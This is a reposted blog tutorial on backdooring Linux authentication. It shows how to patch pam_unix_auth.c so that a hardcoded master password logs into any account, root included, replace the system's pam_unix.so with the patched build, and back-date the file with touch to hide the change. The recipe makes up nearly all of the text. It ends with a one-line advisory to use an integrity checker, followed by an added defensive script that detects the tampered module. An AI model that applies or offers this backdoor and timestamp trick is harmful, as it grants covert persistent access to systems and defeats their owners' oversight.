Source: http://hi.baidu.com/p3rlish/blog ... c64a5d4ec22640.html
Someone explained this to me once back in 2008, though not in such an easy-to-follow way. When I came across this today I found it quite well written, so I am sharing it.
In this article I will show you how to modify the PAM module pam_unix.so so that we can log on to a system (via SSH, for example) using a master password, which can be used with every login on the box.
1. Download PAM Source
ftp://ftp.kernel.org/pub/linux/l ... ux-PAM-1.1.1.tar.gz
2. Unpack the archive and edit the source file we are interested in (pam_unix_auth.c)
tar -xvzf Linux-PAM-1.1.1.tar.gz
pico Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c
3. Search the file for the following lines
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
4. Just after these lines, add the following piece of code
if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}
Here secpass is the second password (our secret password). With this modification, every login for a valid user on the system will accept this password (root included).
5. Go to the main source directory to configure and compile
./configure
make
This creates the module we need in modules/pam_unix/.libs/pam_unix.so
6. Now we need to replace the old module with the new one. But first we will create a backup in case we need it later.
cp /lib/security/pam_unix.so /lib/security/pam_unix.so.orig
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so
7. Test if it works. You can create a new SSH session to the system.
8. Something important to take into consideration is changing the file's modification date. We can do it with touch.
touch -t 200901022110 pam_unix.so
Following these steps, you could have an alternative way to enter a system.
That's why it's so important to use an integrity checker on the system (like Tripwire).
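The integrity check recommended above, as an added example that is not part of the original article: it compares the module's SHA-256 against a recorded baseline and shows why the touch in step 8 does not hide the replacement. The function names and the one-line baseline format are assumptions made for this sketch, and it requires sha256sum and a stat that supports -c (GNU coreutils or BusyBox).

```shell
#!/bin/sh
# Added example: minimal Tripwire-style check for a PAM module.
# Hypothetical helpers; the baseline file holds "<sha256> <mtime-epoch>".

# record_baseline FILE BASELINE
# Run while FILE is known good; keep BASELINE off the monitored host.
record_baseline() {
    printf '%s %s\n' \
        "$(sha256sum "$1" | cut -d' ' -f1)" \
        "$(stat -c %Y "$1")" > "$2"
}

# check_module FILE BASELINE
# Returns 0 if the content matches the baseline, 1 if it was modified.
check_module() {
    read -r want_hash want_mtime < "$2"
    have_hash=$(sha256sum "$1" | cut -d' ' -f1)
    have_mtime=$(stat -c %Y "$1")

    if [ "$have_hash" = "$want_hash" ]; then
        echo "OK: $1 matches baseline"
        return 0
    fi

    echo "MODIFIED: $1 sha256 differs from baseline"
    # A changed file whose mtime still equals the baseline means the
    # timestamp was reset after the change (the touch -t in step 8).
    if [ "$have_mtime" = "$want_mtime" ]; then
        echo "NOTE: mtime equals baseline; timestamp was reset after the change"
    fi
    return 1
}

# Command-line use: sh check_pam.sh /lib/security/pam_unix.so /path/to/baseline
if [ "$#" -eq 2 ]; then
    check_module "$1" "$2"
fi
```

On package-managed systems the same comparison is available from the package database (rpm -V, dpkg --verify), provided the database itself is trusted.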